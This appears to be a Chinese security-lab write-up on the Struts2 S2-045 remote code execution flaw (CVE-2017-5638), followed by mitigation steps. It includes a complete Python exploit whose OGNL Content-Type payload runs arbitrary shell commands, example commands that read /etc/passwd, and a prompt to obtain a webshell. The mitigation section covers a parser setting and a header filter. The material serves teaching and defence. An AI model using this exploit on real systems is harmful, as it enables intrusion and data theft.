【S2-045】Struts2遠程命令執行漏洞(CVE-2017-5638)
Struts
Struts是Apache基金會的一個開源項目,Struts通過採用Java Servlet/JSP技術,實現了基於Java EE Web應用的Model-View-Controller(MVC)設計模式的應用框架,是MVC經典設計模式中的一個經典產品。
目前,Struts框架廣泛應用於政府、公安、交通、金融行業和運營商的網站建設,作為網站開發的底層模板使用,是應用最廣泛的Web應用框架之一。
漏洞介紹
Apache Struts 2被曝存在遠程命令執行漏洞,漏洞編號S2-045,CVE編號CVE-2017-5638,在使用基於Jakarta插件的文件上傳功能時,有可能存在遠程命令執行,導致系統被惡意用戶利用。
惡意用戶可在上傳文件時通過修改HTTP請求頭中的Content-Type值來觸發該漏洞,進而執行系統命令。
影響範圍
Struts 2.3.5 – Struts 2.3.31
Struts 2.5 – Struts 2.5.10
不受影響的版本
Struts 2.3.32 Struts 2.5.10.1
快速檢測方式
使用知道創宇SeeBug可以直接檢測站點是否存在本漏洞
漏洞危害
在default.properties文件中,struts.multipart.parser的值有兩個選擇,分別是jakarta和pell。其中的jakarta解析器是Struts 2框架的標準組成部分。默認情況下jakarta是啟用的,所以該漏洞的嚴重性需要得到正視。
惡意訪問者可通過遠程命令注入執行,令系統執行惡意命令,導致被利用,從而威脅伺服器安全,影響極大。
實驗步驟
步驟1:驗證漏洞
打開目標網站:http://172.16.12.2/
發現跳轉鏈接到http://172.16.12.2/example/HelloWorld.action原始poc.py
提示:
- 已編譯好的POC執行程序如下:
#! /usr/bin/env python n# encoding:utf-8 nimport urllib2 nimport sys nfrom poster.encode import multipart_encode nfrom poster.streaminghttp import register_openers ndef poc(): n if len(sys.argv) < 3: n print Usage: poc.py http://172.16.12.2/example/HelloWorld.action "command" n sys.exit() n register_openers() n datagen, header = multipart_encode({"image": open("tmp.txt", "w+")}) n header["User-Agent"]="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" n header["Content-Type"]="%{(#nike=multipart/form-data).n(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):n((#container=#context[com.opensymphony.xwork2.ActionContext.container]).n(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).n(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).n(#context.setMemberAccess(#dm)))).(#cmd="+str(sys.argv[2])+").(#iswin=(@java.lang.System@getProperty(os.name).toLowerCase().contains(win))).(#cmds=(#iswin?{cmd.exe,/c,#cmd}:{/bin/bash,-c,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).n(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=n(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).n(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" n request = urllib2.Request(str(sys.argv[1]),datagen,headers=header) n response = urllib2.urlopen(request) n print response.read()npoc()n
在該實驗環境中為Python打包程序,poc.exe,使用該工具對目標地址進行測試:
打開cmd,切到poc.exe的目錄下,執行下面命令:
poc.exe http://172.16.12.2/example/HelloWorld.action "ifconfig"n
測試該網站是否存在S2-045漏洞,嘗試執行系統命令ifconfig,結果如下:
成功執行,證明漏洞存在,成功後可以嘗試利用漏洞執行其他命令。
步驟2:臨時修復方案一
修改Struts2的Multipart parser
使用搜索工具搜索ssh連接工具xshell5連接目標機172.16.12.2,用戶名root,密碼123456
修改配置文件
將struts2-core-2.3.31.jar路徑:/var/www/apache-tomcat-7.0.14/webapps/ROOT/WEB-INF/lib/下載到本地桌面,修改文件擴展名為struts2-core-2.3.31.zip,將其解壓到struts2-core-2.3.31文件夾中,打開裡面的文件夾orgapachestruts2右擊目錄下default.properties文件,使用notepad++進行編輯。
找到struts.multipart.parser,該選項就是Struts2的Multipart parser應用配置,默認值為jakarta,即此次出現命令執行漏洞的上傳框架。
將其修改為pell,相當於將存在漏洞的jakarta框架禁用了。修改後值struts.multipart.parser=pell,保存,退出。
注意在行首不能存在注釋符 # 號
重新打包jar文件
在struts2-core-2.3.31文件夾中全部選中,壓縮打包為zip格式,文件名:struts2-core-2.3.31.jar
替換jar文件
使用工具Xftp,將/var/www/apache-tomcat-7.0.14/webapps/ROOT/WEB-INF/lib/路徑下的struts2-core-2.3.31.jar移動到根目錄/,將我們修改配置後重新打包的jar文件放到該目錄下。
重啟tomcat
替換文件後需要重啟tomcat服務,切換到/var/www/apache-tomcat-7.0.14/bin/目錄下,首先執行./shutdown.sh,然後執行./startup.sh
重啟tomcat服務會有15秒左右的延時
驗證漏洞
執行下面命令:
poc.exe http://172.16.12.2/example/HelloWorld.action "cat /etc/passwd"n
poc程序已經無法成功利用了。
步驟3:臨時修復方案二
還原修復方案二環境
在xshell下 執行命令
mv -f /struts-core-2.3.31.jar /var/www/apache-tomcat-7.0.14/webapps/ROOT/WEB-INF/lib/n
將修復方案所修改的配置文件還原。
添加攔截器
此次 S2-045 漏洞觸發點為Content-TypeHTTP頭欄位,故此可以添加action攔截器,過濾非法請求。
攔截類SecurityFilter.java代碼
import java.io.IOException; n import javax.servlet.Filter; n import javax.servlet.FilterChain;n import javax.servlet.FilterConfig;n import javax.servlet.ServletException; n import javax.servlet.ServletRequest; n import javax.servlet.ServletResponse; n import javax.servlet.http.HttpServlet; n import javax.servlet.http.HttpServletRequest; n import javax.servlet.http.HttpServletResponse;n n public class SecurityFilter extends HttpServlet implements Filter { n /** n * n */ n private static final long serialVersionUID = 1L;n n public final String www_url_encode= "application/x-www-form-urlencoded"; n public final String mul_data= "multipart/form-data "; n public final String txt_pla= "text/plain"; public void doFilter(ServletRequest arg0, ServletResponse arg1, FilterChain arg2) throws n IOException, ServletException { HttpServletRequest request = (HttpServletRequest) arg0; HttpServletResponse response = (HttpServletResponse) arg1; n String contenType=request.getHeader("conTent-type"); if(contenType!=null&&!contenType.equals("")&&!contenType.equalsIgnoreCase(www_url_encode)&&!contenType.equalsIgnoreCase(mul_data)&&!contenType.equalsIgnoreCase(txt_pla)){ response.setContentType("text/html;charset=UTF-8"); n response.getWriter().write("非法請求Content-Type!"); return; n} narg2.doFilter(request, response); n} npublic void init(FilterConfig arg0) throws ServletException { n } n}n
將SecurityFilter.java文件編譯為SecurityFilter.class,放入伺服器路徑為:/var/www/apache-tomcat-7.0.14/webapps/ROOT/WEB-INF/classes/
修改web.xml(/var/www/apache-tomcat-7.0.14/webapps/ROOT/WEB-INF/web.xml)使得添加的攔截器生效
添加代碼:
<filter>n <filter-name>SecurityFilter</filter-name>n <filter-class>SecurityFilter</filter-class>n </filter>n<filter-mapping>n <filter-name>SecurityFilter</filter-name>n <url-pattern>/*</url-pattern>n</filter-mapping>n
保存web.xml
重啟tomcat
替換文件後需要重啟tomcat服務,切換到/var/www/apache-tomcat-7.0.14/bin/目錄下,首先執行./shutdown.sh,然後執行./startup.sh
重啟tomcat服務會有5秒左右的延時
驗證漏洞
執行下面命令:
poc.exe http://172.16.12.2/example/HelloWorld.action "cat /etc/passwd"n
服務端攔截了poc程序的惡意請求。
步驟4:主動防禦方案
如業務系統比較複雜,以上臨時修復方案不能使用時,且無法輕易的升級struts的版本時,可以使用知道創宇的創宇盾來攔截網路的攻擊流量。
思考
根據poc代碼,思考如何去拿到網站的WebShell?
參考資料
1.https://cwiki.apache.org/confluence/display/WW/S2-045?from=singlemessage&isappinstalled=0)
2.http://bbs.ichunqiu.com/thread-19971-1-1.html
實驗場景連接:【S2-045】 Struts2遠程命令執行漏洞(CVE-2017-5638)
推薦閱讀:
※OSI七層模型中,每一層的數據包都是誰生成和解包的?
※烏雲背後的「白帽子」
※掌握哪些技能才有希望進入玄武實驗室?
※俄羅斯大使被殺的真相能否大白?就看俄羅斯黑客能否破解iPhone 4S